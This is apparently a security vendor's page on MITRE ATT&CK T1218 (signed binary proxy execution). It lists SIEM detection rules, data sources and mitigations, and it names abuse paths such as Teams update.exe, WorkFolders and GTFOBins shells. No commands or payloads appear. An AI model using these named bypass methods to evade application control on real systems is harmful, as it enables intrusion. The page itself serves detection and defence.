MaxPatrol SIEM

Detects cyberincidents that undermine cyber resilience of a company

T1218: System Binary Proxy Execution

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system. Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.

Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.

Positive Technologies products that cover the technique

MaxPatrol SIEM knowledge base

sap_suspicious_user_activity: PT-CR-245: SAPASABAP_GW_Rfcexec_call: RFCEXEC run
mitre_attck_defense_evasion: PT-CR-1864: Proxy_Execution_via_WorkFolders: An attacker can launch masqueraded control.exe file in the current working directory using WorkFolders in order to bypass security measures
mitre_attck_defense_evasion: PT-CR-604: Microsoft_Teams_AWL_Bypass: An attempt to bypass application-start restrictions by using update.exe (a binary to update installed NuGet/Squirrel packages included in the Microsoft Teams installation)
mitre_attck_defense_evasion: PT-CR-650: Suspicious_File_Created_by_Legal_Process: Detects creation of suspicious files by legitimate processes
unix_mitre_attck_defense_evasion: PT-CR-1674: Unix_Shell_Command_via_GTFOBINS: An interactive system shell was created using a GTFOBins utility. GTFOBins is a Unix binaries that can be used to bypass local security restrictions in misconfigured systems.

Detection

IDDS0011Data source and componentModule: Module LoadDescription

Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.

IDDS0029Data source and componentNetwork Traffic: Network Connection CreationDescription

Monitor for newly constructed network connections that are sent or received by untrusted hosts.

IDDS0009Data source and componentProcess: Process CreationDescription

Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.

IDDS0009Data source and componentProcess: OS API ExecutionDescription

Monitor for API calls that bypass process and/or signature based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries.

IDDS0024Data source and componentWindows Registry: Windows Registry Key ModificationDescription

Monitor for changes made to Windows Registry keys and/or values that may forge credential materials that can be used to gain access to web applications or Internet services.

IDDS0017Data source and componentCommand: Command ExecutionDescription

Monitor executed commands and arguments that may forge credential materials that can be used to gain access to web applications or Internet services.

IDDS0022Data source and componentFile: File CreationDescription

Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.

Mitigation

IDM1042NameDisable or Remove Feature or ProgramDescription

Many native binaries may not be necessary within a given environment.

IDM1050NameExploit ProtectionDescription

Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using using trusted binaries to bypass application control.

IDM1037NameFilter Network TrafficDescription

Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.

IDM1026NamePrivileged Account ManagementDescription

Restrict execution of particularly vulnerable binaries to privileged accounts or groups that need to use it to lessen the opportunities for malicious usage.

IDM1038NameExecution PreventionDescription

Consider using application control to prevent execution of binaries that are susceptible to abuse and not required for a given system or network.

IDM1021NameRestrict Web-Based ContentDescription

Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.